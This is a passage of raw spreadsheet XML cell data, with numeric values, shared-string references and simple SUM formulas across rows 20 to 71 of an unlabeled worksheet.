      <c r="M20" s="32"/>
      <c r="N20" s="31"/>
      <c r="O20" s="1">
        <v>18.0</v>
      </c>
      <c r="P20" s="3" t="s">
        <v>166</v>
      </c>
      <c r="Q20" s="22">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="R20" s="29"/>
      <c r="S20" s="29"/>
      <c r="T20" s="23">
        <v>1.0</v>
      </c>
      <c r="U20" s="29"/>
      <c r="V20" s="19">
        <v>22.0</v>
      </c>
      <c r="W20" s="19">
        <v>36.0</v>
      </c>
      <c r="X20" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y20" s="25">
        <v>3.0</v>
      </c>
      <c r="AA20" s="3" t="s">
        <v>162</v>
      </c>
      <c r="AB20" s="1" t="s">
        <v>167</v>
      </c>
      <c r="AC20" s="28"/>
      <c r="AD20" s="28"/>
      <c r="AE20" s="28"/>
      <c r="AF20" s="28"/>
    </row>
    <row r="21">
      <c r="A21" s="31"/>
      <c r="B21" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>31</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E21" s="1">
        <v>72328.0</v>
      </c>
      <c r="F21" s="1">
        <v>1162644.0</v>
      </c>
      <c r="G21" s="4">
        <f t="shared" ref="G21:G23" si="4">sum(H21:K21)</f>
        <v>6</v>
      </c>
      <c r="H21" s="1">
        <v>1.0</v>
      </c>
      <c r="I21" s="1">
        <v>3.0</v>
      </c>
      <c r="J21" s="1">
        <v>2.0</v>
      </c>
      <c r="K21" s="1">
        <v>0.0</v>
      </c>
      <c r="L21" s="1">
        <v>2.0</v>
      </c>
      <c r="M21" s="1">
        <v>2.0</v>
      </c>
      <c r="N21" s="31"/>
      <c r="O21" s="1">
        <v>19.0</v>
      </c>
      <c r="P21" s="3" t="s">
        <v>168</v>
      </c>
      <c r="Q21" s="22">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="R21" s="29"/>
      <c r="S21" s="23">
        <v>1.0</v>
      </c>
      <c r="T21" s="23">
        <v>1.0</v>
      </c>
      <c r="U21" s="29"/>
      <c r="V21" s="19">
        <v>858.0</v>
      </c>
      <c r="W21" s="19">
        <v>1112.0</v>
      </c>
      <c r="X21" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y21" s="25">
        <v>18.0</v>
      </c>
      <c r="AA21" s="3" t="s">
        <v>162</v>
      </c>
      <c r="AB21" s="1" t="s">
        <v>169</v>
      </c>
      <c r="AC21" s="26">
        <v>1.38E-5</v>
      </c>
      <c r="AD21" s="28"/>
      <c r="AE21" s="28"/>
      <c r="AF21" s="26">
        <v>1.38E-5</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="31"/>
      <c r="B22" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>35</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E22" s="1">
        <v>14.0</v>
      </c>
      <c r="F22" s="1">
        <v>23.0</v>
      </c>
      <c r="G22" s="4">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="H22" s="1">
        <v>2.0</v>
      </c>
      <c r="I22" s="1">
        <v>0.0</v>
      </c>
      <c r="J22" s="1">
        <v>2.0</v>
      </c>
      <c r="K22" s="1">
        <v>0.0</v>
      </c>
      <c r="L22" s="1">
        <v>5.0</v>
      </c>
      <c r="M22" s="1">
        <v>6.0</v>
      </c>
      <c r="N22" s="31"/>
      <c r="O22" s="1">
        <v>20.0</v>
      </c>
      <c r="P22" s="3" t="s">
        <v>170</v>
      </c>
      <c r="Q22" s="22">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="R22" s="29"/>
      <c r="S22" s="23">
        <v>1.0</v>
      </c>
      <c r="T22" s="23">
        <v>3.0</v>
      </c>
      <c r="U22" s="29"/>
      <c r="V22" s="19">
        <v>252.0</v>
      </c>
      <c r="W22" s="19">
        <v>494.0</v>
      </c>
      <c r="X22" s="24" t="s">
        <v>136</v>
      </c>
      <c r="Y22" s="25">
        <v>4.0</v>
      </c>
      <c r="AA22" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB22" s="1" t="s">
        <v>172</v>
      </c>
      <c r="AC22" s="26">
        <v>0.055556</v>
      </c>
      <c r="AD22" s="28"/>
      <c r="AE22" s="28"/>
      <c r="AF22" s="26">
        <v>0.055556</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="31"/>
      <c r="B23" s="3" t="s">
        <v>17</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>18</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E23" s="1">
        <v>22.0</v>
      </c>
      <c r="F23" s="1">
        <v>1135.0</v>
      </c>
      <c r="G23" s="4">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="H23" s="1">
        <v>1.0</v>
      </c>
      <c r="I23" s="1">
        <v>0.0</v>
      </c>
      <c r="J23" s="1">
        <v>2.0</v>
      </c>
      <c r="K23" s="1">
        <v>0.0</v>
      </c>
      <c r="L23" s="1">
        <v>5.0</v>
      </c>
      <c r="M23" s="1">
        <v>6.0</v>
      </c>
      <c r="N23" s="31"/>
      <c r="O23" s="31"/>
      <c r="P23" s="33" t="s">
        <v>173</v>
      </c>
      <c r="Q23" s="34">
        <f t="shared" ref="Q23:U23" si="5">SUM(Q3:Q22)</f>
        <v>77</v>
      </c>
      <c r="R23" s="34">
        <f t="shared" si="5"/>
        <v>22</v>
      </c>
      <c r="S23" s="34">
        <f t="shared" si="5"/>
        <v>10</v>
      </c>
      <c r="T23" s="34">
        <f t="shared" si="5"/>
        <v>44</v>
      </c>
      <c r="U23" s="34">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="AA23" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB23" s="1" t="s">
        <v>174</v>
      </c>
      <c r="AC23" s="26">
        <v>0.222222</v>
      </c>
      <c r="AD23" s="28"/>
      <c r="AE23" s="28"/>
      <c r="AF23" s="26">
        <v>0.222222</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="31"/>
      <c r="B24" s="31"/>
      <c r="C24" s="31"/>
      <c r="D24" s="31"/>
      <c r="E24" s="31"/>
      <c r="F24" s="31"/>
      <c r="G24" s="31"/>
      <c r="H24" s="31"/>
      <c r="I24" s="31"/>
      <c r="J24" s="31"/>
      <c r="K24" s="31"/>
      <c r="L24" s="32"/>
      <c r="M24" s="32"/>
      <c r="N24" s="31"/>
      <c r="O24" s="31"/>
      <c r="P24" s="32" t="s">
        <v>175</v>
      </c>
      <c r="S24" s="1">
        <v>3.0</v>
      </c>
      <c r="T24" s="1">
        <v>2.0</v>
      </c>
      <c r="AA24" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB24" s="1" t="s">
        <v>176</v>
      </c>
      <c r="AC24" s="26">
        <v>0.333333</v>
      </c>
      <c r="AD24" s="28"/>
      <c r="AE24" s="26">
        <v>0.151899</v>
      </c>
      <c r="AF24" s="26">
        <v>0.333333</v>
      </c>
    </row>
    <row r="25">
      <c r="B25" s="31"/>
      <c r="H25" s="31"/>
      <c r="I25" s="31"/>
      <c r="J25" s="31"/>
      <c r="K25" s="31"/>
      <c r="L25" s="32"/>
      <c r="M25" s="32"/>
      <c r="N25" s="31"/>
      <c r="O25" s="31"/>
      <c r="P25" s="31"/>
      <c r="AA25" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB25" s="1" t="s">
        <v>177</v>
      </c>
      <c r="AC25" s="26">
        <v>0.25</v>
      </c>
      <c r="AD25" s="28"/>
      <c r="AE25" s="26">
        <v>0.164557</v>
      </c>
      <c r="AF25" s="26">
        <v>0.25</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="32">
        <v>1.0</v>
      </c>
      <c r="B26" s="31"/>
      <c r="C26" s="32" t="s">
        <v>147</v>
      </c>
      <c r="D26" s="32" t="s">
        <v>178</v>
      </c>
      <c r="E26" s="32">
        <v>26.0</v>
      </c>
      <c r="F26" s="32">
        <v>74.0</v>
      </c>
      <c r="G26" s="32">
        <v>1.0</v>
      </c>
      <c r="H26" s="31"/>
      <c r="I26" s="31"/>
      <c r="J26" s="31"/>
      <c r="K26" s="31"/>
      <c r="L26" s="32"/>
      <c r="M26" s="32"/>
      <c r="N26" s="31"/>
      <c r="O26" s="31"/>
      <c r="P26" s="1" t="s">
        <v>179</v>
      </c>
      <c r="AA26" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB26" s="1" t="s">
        <v>180</v>
      </c>
      <c r="AC26" s="28"/>
      <c r="AD26" s="28"/>
      <c r="AE26" s="28"/>
      <c r="AF26" s="28"/>
    </row>
    <row r="27">
      <c r="A27" s="32">
        <v>2.0</v>
      </c>
      <c r="B27" s="31"/>
      <c r="C27" s="32" t="s">
        <v>149</v>
      </c>
      <c r="D27" s="32" t="s">
        <v>181</v>
      </c>
      <c r="E27" s="32">
        <v>5.0</v>
      </c>
      <c r="F27" s="32">
        <v>11.0</v>
      </c>
      <c r="G27" s="32">
        <v>1.0</v>
      </c>
      <c r="H27" s="31"/>
      <c r="I27" s="31"/>
      <c r="J27" s="31"/>
      <c r="K27" s="31"/>
      <c r="L27" s="32"/>
      <c r="M27" s="32"/>
      <c r="N27" s="31"/>
      <c r="O27" s="31"/>
      <c r="P27" s="32" t="s">
        <v>182</v>
      </c>
      <c r="AA27" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB27" s="1" t="s">
        <v>183</v>
      </c>
      <c r="AC27" s="26">
        <v>0.083333</v>
      </c>
      <c r="AD27" s="28"/>
      <c r="AE27" s="28"/>
      <c r="AF27" s="26">
        <v>0.083333</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="32">
        <v>3.0</v>
      </c>
      <c r="B28" s="31"/>
      <c r="C28" s="32" t="s">
        <v>151</v>
      </c>
      <c r="D28" s="32" t="s">
        <v>184</v>
      </c>
      <c r="E28" s="32">
        <v>296.0</v>
      </c>
      <c r="F28" s="32">
        <v>596.0</v>
      </c>
      <c r="G28" s="32">
        <v>1.0</v>
      </c>
      <c r="H28" s="31"/>
      <c r="I28" s="31"/>
      <c r="J28" s="31"/>
      <c r="K28" s="31"/>
      <c r="L28" s="32"/>
      <c r="M28" s="32"/>
      <c r="N28" s="31"/>
      <c r="O28" s="31"/>
      <c r="P28" s="32" t="s">
        <v>185</v>
      </c>
      <c r="AA28" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB28" s="1" t="s">
        <v>186</v>
      </c>
      <c r="AC28" s="26">
        <v>0.083333</v>
      </c>
      <c r="AD28" s="28"/>
      <c r="AE28" s="28"/>
      <c r="AF28" s="26">
        <v>0.083333</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="32">
        <v>4.0</v>
      </c>
      <c r="B29" s="31"/>
      <c r="C29" s="32" t="s">
        <v>153</v>
      </c>
      <c r="D29" s="32" t="s">
        <v>187</v>
      </c>
      <c r="E29" s="32">
        <v>17.0</v>
      </c>
      <c r="F29" s="32">
        <v>40.0</v>
      </c>
      <c r="G29" s="32">
        <v>1.0</v>
      </c>
      <c r="H29" s="31"/>
      <c r="I29" s="31"/>
      <c r="J29" s="31"/>
      <c r="K29" s="31"/>
      <c r="L29" s="35"/>
      <c r="M29" s="35"/>
      <c r="N29" s="31"/>
      <c r="O29" s="31"/>
      <c r="P29" s="31"/>
      <c r="AA29" s="3" t="s">
        <v>171</v>
      </c>
      <c r="AB29" s="1" t="s">
        <v>188</v>
      </c>
      <c r="AC29" s="28"/>
      <c r="AD29" s="28"/>
      <c r="AE29" s="28"/>
      <c r="AF29" s="28"/>
    </row>
    <row r="30">
      <c r="A30" s="32">
        <v>5.0</v>
      </c>
      <c r="B30" s="31"/>
      <c r="C30" s="32" t="s">
        <v>155</v>
      </c>
      <c r="D30" s="32" t="s">
        <v>189</v>
      </c>
      <c r="E30" s="36">
        <v>533.0</v>
      </c>
      <c r="F30" s="32">
        <v>1436.0</v>
      </c>
      <c r="G30" s="32">
        <v>1.0</v>
      </c>
      <c r="H30" s="31"/>
      <c r="I30" s="31"/>
      <c r="J30" s="31"/>
      <c r="K30" s="31"/>
      <c r="L30" s="35"/>
      <c r="M30" s="35"/>
      <c r="N30" s="31"/>
      <c r="O30" s="31"/>
      <c r="P30" s="32" t="s">
        <v>190</v>
      </c>
      <c r="AA30" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB30" s="1" t="s">
        <v>192</v>
      </c>
      <c r="AC30" s="28"/>
      <c r="AD30" s="28"/>
      <c r="AE30" s="28"/>
      <c r="AF30" s="28"/>
    </row>
    <row r="31">
      <c r="A31" s="32">
        <v>6.0</v>
      </c>
      <c r="B31" s="31"/>
      <c r="C31" s="32" t="s">
        <v>157</v>
      </c>
      <c r="D31" s="32" t="s">
        <v>193</v>
      </c>
      <c r="E31" s="32">
        <v>49977.0</v>
      </c>
      <c r="F31" s="32">
        <v>58329.0</v>
      </c>
      <c r="G31" s="32">
        <v>1.0</v>
      </c>
      <c r="H31" s="31"/>
      <c r="I31" s="31"/>
      <c r="J31" s="31"/>
      <c r="K31" s="31"/>
      <c r="L31" s="32"/>
      <c r="M31" s="32"/>
      <c r="N31" s="31"/>
      <c r="O31" s="31"/>
      <c r="P31" s="31"/>
      <c r="AA31" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB31" s="1" t="s">
        <v>194</v>
      </c>
      <c r="AC31" s="26">
        <v>0.038062</v>
      </c>
      <c r="AD31" s="28"/>
      <c r="AE31" s="26">
        <v>0.022923</v>
      </c>
      <c r="AF31" s="26">
        <v>0.038062</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="32">
        <v>7.0</v>
      </c>
      <c r="B32" s="31"/>
      <c r="C32" s="32" t="s">
        <v>159</v>
      </c>
      <c r="D32" s="32" t="s">
        <v>195</v>
      </c>
      <c r="E32" s="32">
        <v>21.0</v>
      </c>
      <c r="F32" s="32">
        <v>73.0</v>
      </c>
      <c r="G32" s="32">
        <v>1.0</v>
      </c>
      <c r="H32" s="31"/>
      <c r="I32" s="31"/>
      <c r="J32" s="31"/>
      <c r="K32" s="31"/>
      <c r="L32" s="32"/>
      <c r="M32" s="32"/>
      <c r="N32" s="31"/>
      <c r="O32" s="31"/>
      <c r="P32" s="31"/>
      <c r="AA32" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB32" s="1" t="s">
        <v>196</v>
      </c>
      <c r="AC32" s="28"/>
      <c r="AD32" s="28"/>
      <c r="AE32" s="28"/>
      <c r="AF32" s="28"/>
    </row>
    <row r="33">
      <c r="A33" s="32">
        <v>8.0</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>161</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>195</v>
      </c>
      <c r="E33" s="32">
        <v>21.0</v>
      </c>
      <c r="F33" s="32">
        <v>73.0</v>
      </c>
      <c r="G33" s="1">
        <v>1.0</v>
      </c>
      <c r="AA33" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB33" s="1" t="s">
        <v>197</v>
      </c>
      <c r="AC33" s="28"/>
      <c r="AD33" s="28"/>
      <c r="AE33" s="28"/>
      <c r="AF33" s="28"/>
    </row>
    <row r="34">
      <c r="A34" s="32">
        <v>9.0</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>164</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>198</v>
      </c>
      <c r="E34" s="1">
        <v>9.0</v>
      </c>
      <c r="F34" s="1">
        <v>28.0</v>
      </c>
      <c r="G34" s="1">
        <v>1.0</v>
      </c>
      <c r="AA34" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB34" s="1" t="s">
        <v>199</v>
      </c>
      <c r="AC34" s="28"/>
      <c r="AD34" s="28"/>
      <c r="AE34" s="28"/>
      <c r="AF34" s="28"/>
    </row>
    <row r="35">
      <c r="A35" s="32">
        <v>10.0</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>166</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>200</v>
      </c>
      <c r="E35" s="1">
        <v>22.0</v>
      </c>
      <c r="F35" s="1">
        <v>36.0</v>
      </c>
      <c r="G35" s="1">
        <v>1.0</v>
      </c>
      <c r="AA35" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB35" s="1" t="s">
        <v>201</v>
      </c>
      <c r="AC35" s="26">
        <v>0.027682</v>
      </c>
      <c r="AD35" s="28"/>
      <c r="AE35" s="26">
        <v>0.011461</v>
      </c>
      <c r="AF35" s="26">
        <v>0.027682</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="32">
        <v>11.0</v>
      </c>
      <c r="C36" s="32" t="s">
        <v>168</v>
      </c>
      <c r="D36" s="32" t="s">
        <v>202</v>
      </c>
      <c r="E36" s="32">
        <v>858.0</v>
      </c>
      <c r="F36" s="32">
        <v>1112.0</v>
      </c>
      <c r="G36" s="32">
        <v>1.0</v>
      </c>
      <c r="AA36" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB36" s="1" t="s">
        <v>203</v>
      </c>
      <c r="AC36" s="26">
        <v>0.044983</v>
      </c>
      <c r="AD36" s="28"/>
      <c r="AE36" s="26">
        <v>0.002865</v>
      </c>
      <c r="AF36" s="26">
        <v>0.044983</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="32">
        <v>12.0</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>170</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>204</v>
      </c>
      <c r="E37" s="1">
        <v>252.0</v>
      </c>
      <c r="F37" s="1">
        <v>494.0</v>
      </c>
      <c r="G37" s="1">
        <v>2.0</v>
      </c>
      <c r="AA37" s="3" t="s">
        <v>191</v>
      </c>
      <c r="AB37" s="1" t="s">
        <v>205</v>
      </c>
      <c r="AC37" s="26">
        <v>0.013841</v>
      </c>
      <c r="AD37" s="28"/>
      <c r="AE37" s="28"/>
      <c r="AF37" s="26">
        <v>0.013841</v>
      </c>
    </row>
    <row r="38">
      <c r="AA38" s="3" t="s">
        <v>26</v>
      </c>
      <c r="AB38" s="1" t="s">
        <v>206</v>
      </c>
      <c r="AC38" s="28"/>
      <c r="AD38" s="28"/>
      <c r="AE38" s="28"/>
      <c r="AF38" s="28"/>
    </row>
    <row r="39">
      <c r="AA39" s="3" t="s">
        <v>26</v>
      </c>
      <c r="AB39" s="1" t="s">
        <v>207</v>
      </c>
      <c r="AC39" s="26">
        <v>0.117647</v>
      </c>
      <c r="AD39" s="28"/>
      <c r="AE39" s="26">
        <v>0.157895</v>
      </c>
      <c r="AF39" s="26">
        <v>0.117647</v>
      </c>
    </row>
    <row r="40">
      <c r="AA40" s="3" t="s">
        <v>26</v>
      </c>
      <c r="AB40" s="1" t="s">
        <v>208</v>
      </c>
      <c r="AC40" s="26">
        <v>0.176471</v>
      </c>
      <c r="AD40" s="28"/>
      <c r="AE40" s="28"/>
      <c r="AF40" s="26">
        <v>0.176471</v>
      </c>
    </row>
    <row r="41">
      <c r="AA41" s="3" t="s">
        <v>26</v>
      </c>
      <c r="AB41" s="1" t="s">
        <v>209</v>
      </c>
      <c r="AC41" s="26">
        <v>0.058824</v>
      </c>
      <c r="AD41" s="28"/>
      <c r="AE41" s="28"/>
      <c r="AF41" s="26">
        <v>0.058824</v>
      </c>
    </row>
    <row r="42">
      <c r="AA42" s="3" t="s">
        <v>26</v>
      </c>
      <c r="AB42" s="1" t="s">
        <v>210</v>
      </c>
      <c r="AC42" s="26">
        <v>0.117647</v>
      </c>
      <c r="AD42" s="26">
        <v>0.333333</v>
      </c>
      <c r="AE42" s="26">
        <v>0.052632</v>
      </c>
      <c r="AF42" s="26">
        <v>0.117647</v>
      </c>
    </row>
    <row r="43">
      <c r="AA43" s="3" t="s">
        <v>35</v>
      </c>
      <c r="AB43" s="1" t="s">
        <v>211</v>
      </c>
      <c r="AC43" s="26">
        <v>0.076923</v>
      </c>
      <c r="AD43" s="28"/>
      <c r="AE43" s="28"/>
      <c r="AF43" s="26">
        <v>0.076923</v>
      </c>
    </row>
    <row r="44">
      <c r="AA44" s="3" t="s">
        <v>35</v>
      </c>
      <c r="AB44" s="1" t="s">
        <v>212</v>
      </c>
      <c r="AC44" s="26">
        <v>0.307692</v>
      </c>
      <c r="AD44" s="28"/>
      <c r="AE44" s="26">
        <v>0.05</v>
      </c>
      <c r="AF44" s="26">
        <v>0.307692</v>
      </c>
    </row>
    <row r="45">
      <c r="AA45" s="3" t="s">
        <v>35</v>
      </c>
      <c r="AB45" s="1" t="s">
        <v>213</v>
      </c>
      <c r="AC45" s="26">
        <v>0.230769</v>
      </c>
      <c r="AD45" s="28"/>
      <c r="AE45" s="26">
        <v>0.05</v>
      </c>
      <c r="AF45" s="26">
        <v>0.230769</v>
      </c>
    </row>
    <row r="46">
      <c r="AA46" s="3" t="s">
        <v>35</v>
      </c>
      <c r="AB46" s="1" t="s">
        <v>214</v>
      </c>
      <c r="AC46" s="28"/>
      <c r="AD46" s="28"/>
      <c r="AE46" s="28"/>
      <c r="AF46" s="28"/>
    </row>
    <row r="47">
      <c r="AA47" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB47" s="1" t="s">
        <v>215</v>
      </c>
      <c r="AC47" s="26">
        <v>0.111111</v>
      </c>
      <c r="AD47" s="28"/>
      <c r="AE47" s="28"/>
      <c r="AF47" s="26">
        <v>0.111111</v>
      </c>
    </row>
    <row r="48">
      <c r="AA48" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB48" s="1" t="s">
        <v>216</v>
      </c>
      <c r="AC48" s="26">
        <v>0.185185</v>
      </c>
      <c r="AD48" s="28"/>
      <c r="AE48" s="26">
        <v>0.094595</v>
      </c>
      <c r="AF48" s="26">
        <v>0.185185</v>
      </c>
    </row>
    <row r="49">
      <c r="AA49" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB49" s="1" t="s">
        <v>217</v>
      </c>
      <c r="AC49" s="26">
        <v>0.037037</v>
      </c>
      <c r="AD49" s="28"/>
      <c r="AE49" s="26">
        <v>0.013514</v>
      </c>
      <c r="AF49" s="26">
        <v>0.037037</v>
      </c>
    </row>
    <row r="50">
      <c r="AA50" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB50" s="1" t="s">
        <v>218</v>
      </c>
      <c r="AC50" s="26">
        <v>0.111111</v>
      </c>
      <c r="AD50" s="28"/>
      <c r="AE50" s="26">
        <v>0.216216</v>
      </c>
      <c r="AF50" s="26">
        <v>0.111111</v>
      </c>
    </row>
    <row r="51">
      <c r="AA51" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB51" s="1" t="s">
        <v>219</v>
      </c>
      <c r="AC51" s="26">
        <v>0.037037</v>
      </c>
      <c r="AD51" s="28"/>
      <c r="AE51" s="26">
        <v>0.310811</v>
      </c>
      <c r="AF51" s="26">
        <v>0.037037</v>
      </c>
    </row>
    <row r="52">
      <c r="AA52" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB52" s="1" t="s">
        <v>220</v>
      </c>
      <c r="AC52" s="26">
        <v>0.037037</v>
      </c>
      <c r="AD52" s="28"/>
      <c r="AE52" s="26">
        <v>0.013514</v>
      </c>
      <c r="AF52" s="26">
        <v>0.037037</v>
      </c>
    </row>
    <row r="53">
      <c r="AA53" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB53" s="1" t="s">
        <v>221</v>
      </c>
      <c r="AC53" s="26">
        <v>0.259259</v>
      </c>
      <c r="AD53" s="28"/>
      <c r="AE53" s="26">
        <v>0.054054</v>
      </c>
      <c r="AF53" s="26">
        <v>0.259259</v>
      </c>
    </row>
    <row r="54">
      <c r="AA54" s="3" t="s">
        <v>147</v>
      </c>
      <c r="AB54" s="1" t="s">
        <v>222</v>
      </c>
      <c r="AC54" s="26">
        <v>0.259259</v>
      </c>
      <c r="AD54" s="28"/>
      <c r="AE54" s="26">
        <v>0.121622</v>
      </c>
      <c r="AF54" s="26">
        <v>0.259259</v>
      </c>
    </row>
    <row r="55">
      <c r="AA55" s="3" t="s">
        <v>149</v>
      </c>
      <c r="AB55" s="1" t="s">
        <v>223</v>
      </c>
      <c r="AC55" s="28"/>
      <c r="AD55" s="28"/>
      <c r="AE55" s="28"/>
      <c r="AF55" s="28"/>
    </row>
    <row r="56">
      <c r="AA56" s="3" t="s">
        <v>149</v>
      </c>
      <c r="AB56" s="1" t="s">
        <v>224</v>
      </c>
      <c r="AC56" s="26">
        <v>0.166667</v>
      </c>
      <c r="AD56" s="28"/>
      <c r="AE56" s="28"/>
      <c r="AF56" s="26">
        <v>0.166667</v>
      </c>
    </row>
    <row r="57">
      <c r="AA57" s="3" t="s">
        <v>149</v>
      </c>
      <c r="AB57" s="1" t="s">
        <v>225</v>
      </c>
      <c r="AC57" s="28"/>
      <c r="AD57" s="28"/>
      <c r="AE57" s="28"/>
      <c r="AF57" s="28"/>
    </row>
    <row r="58">
      <c r="AA58" s="3" t="s">
        <v>151</v>
      </c>
      <c r="AB58" s="1" t="s">
        <v>226</v>
      </c>
      <c r="AC58" s="28"/>
      <c r="AD58" s="28"/>
      <c r="AE58" s="28"/>
      <c r="AF58" s="28"/>
    </row>
    <row r="59">
      <c r="AA59" s="3" t="s">
        <v>151</v>
      </c>
      <c r="AB59" s="1" t="s">
        <v>227</v>
      </c>
      <c r="AC59" s="26">
        <v>0.057239</v>
      </c>
      <c r="AD59" s="28"/>
      <c r="AE59" s="26">
        <v>0.045302</v>
      </c>
      <c r="AF59" s="26">
        <v>0.057239</v>
      </c>
    </row>
    <row r="60">
      <c r="AA60" s="3" t="s">
        <v>153</v>
      </c>
      <c r="AB60" s="1" t="s">
        <v>228</v>
      </c>
      <c r="AC60" s="26">
        <v>0.111111</v>
      </c>
      <c r="AD60" s="28"/>
      <c r="AE60" s="26">
        <v>0.025</v>
      </c>
      <c r="AF60" s="26">
        <v>0.111111</v>
      </c>
    </row>
    <row r="61">
      <c r="AA61" s="3" t="s">
        <v>153</v>
      </c>
      <c r="AB61" s="1" t="s">
        <v>229</v>
      </c>
      <c r="AC61" s="26">
        <v>0.111111</v>
      </c>
      <c r="AD61" s="28"/>
      <c r="AE61" s="26">
        <v>0.025</v>
      </c>
      <c r="AF61" s="26">
        <v>0.111111</v>
      </c>
    </row>
    <row r="62">
      <c r="AA62" s="3" t="s">
        <v>153</v>
      </c>
      <c r="AB62" s="1" t="s">
        <v>230</v>
      </c>
      <c r="AC62" s="28"/>
      <c r="AD62" s="28"/>
      <c r="AE62" s="28"/>
      <c r="AF62" s="28"/>
    </row>
    <row r="63">
      <c r="AA63" s="3" t="s">
        <v>155</v>
      </c>
      <c r="AB63" s="1" t="s">
        <v>231</v>
      </c>
      <c r="AC63" s="26">
        <v>0.132841</v>
      </c>
      <c r="AD63" s="26">
        <v>0.190476</v>
      </c>
      <c r="AE63" s="26">
        <v>0.001393</v>
      </c>
      <c r="AF63" s="26">
        <v>0.132841</v>
      </c>
    </row>
    <row r="64">
      <c r="AA64" s="3" t="s">
        <v>155</v>
      </c>
      <c r="AB64" s="1" t="s">
        <v>232</v>
      </c>
      <c r="AC64" s="26">
        <v>0.012915</v>
      </c>
      <c r="AD64" s="28"/>
      <c r="AE64" s="28"/>
      <c r="AF64" s="26">
        <v>0.012915</v>
      </c>
    </row>
    <row r="65">
      <c r="AA65" s="3" t="s">
        <v>157</v>
      </c>
      <c r="AB65" s="1" t="s">
        <v>233</v>
      </c>
      <c r="AC65" s="26">
        <v>5.2E-4</v>
      </c>
      <c r="AD65" s="28"/>
      <c r="AE65" s="26">
        <v>6.86E-5</v>
      </c>
      <c r="AF65" s="26">
        <v>5.2E-4</v>
      </c>
    </row>
    <row r="66">
      <c r="AA66" s="3" t="s">
        <v>159</v>
      </c>
      <c r="AB66" s="1" t="s">
        <v>234</v>
      </c>
      <c r="AC66" s="26">
        <v>0.136364</v>
      </c>
      <c r="AD66" s="28"/>
      <c r="AE66" s="28"/>
      <c r="AF66" s="26">
        <v>0.136364</v>
      </c>
    </row>
    <row r="67">
      <c r="AA67" s="3" t="s">
        <v>159</v>
      </c>
      <c r="AB67" s="1" t="s">
        <v>235</v>
      </c>
      <c r="AC67" s="26">
        <v>0.409091</v>
      </c>
      <c r="AD67" s="28"/>
      <c r="AE67" s="26">
        <v>0.273973</v>
      </c>
      <c r="AF67" s="26">
        <v>0.409091</v>
      </c>
    </row>
    <row r="68">
      <c r="AA68" s="3" t="s">
        <v>161</v>
      </c>
      <c r="AB68" s="1" t="s">
        <v>236</v>
      </c>
      <c r="AC68" s="26">
        <v>0.409091</v>
      </c>
      <c r="AD68" s="28"/>
      <c r="AE68" s="26">
        <v>0.054795</v>
      </c>
      <c r="AF68" s="26">
        <v>0.409091</v>
      </c>
    </row>
    <row r="69">
      <c r="AA69" s="3" t="s">
        <v>164</v>
      </c>
      <c r="AB69" s="1" t="s">
        <v>237</v>
      </c>
      <c r="AC69" s="28"/>
      <c r="AD69" s="28"/>
      <c r="AE69" s="28"/>
      <c r="AF69" s="28"/>
    </row>
    <row r="70">
      <c r="AA70" s="3" t="s">
        <v>164</v>
      </c>
      <c r="AB70" s="1" t="s">
        <v>238</v>
      </c>
      <c r="AC70" s="26">
        <v>0.1</v>
      </c>
      <c r="AD70" s="28"/>
      <c r="AE70" s="28"/>
      <c r="AF70" s="26">
        <v>0.1</v>
      </c>
    </row>
    <row r="71">
      <c r="AA71" s="3" t="s">
        <v>164</v>
      </c>
      <c r="AB71" s="1" t="s">
        <v>239</v>
      </c>
      <c r="AC71" s="26">
        <v>0.1</v>
      </c>
      <c r="AD71" s="28"/>
      <c r="AE71" s="28"/>
      <c r="AF71" s="26">
        <v>2.2</v>
      </c>
    </row>
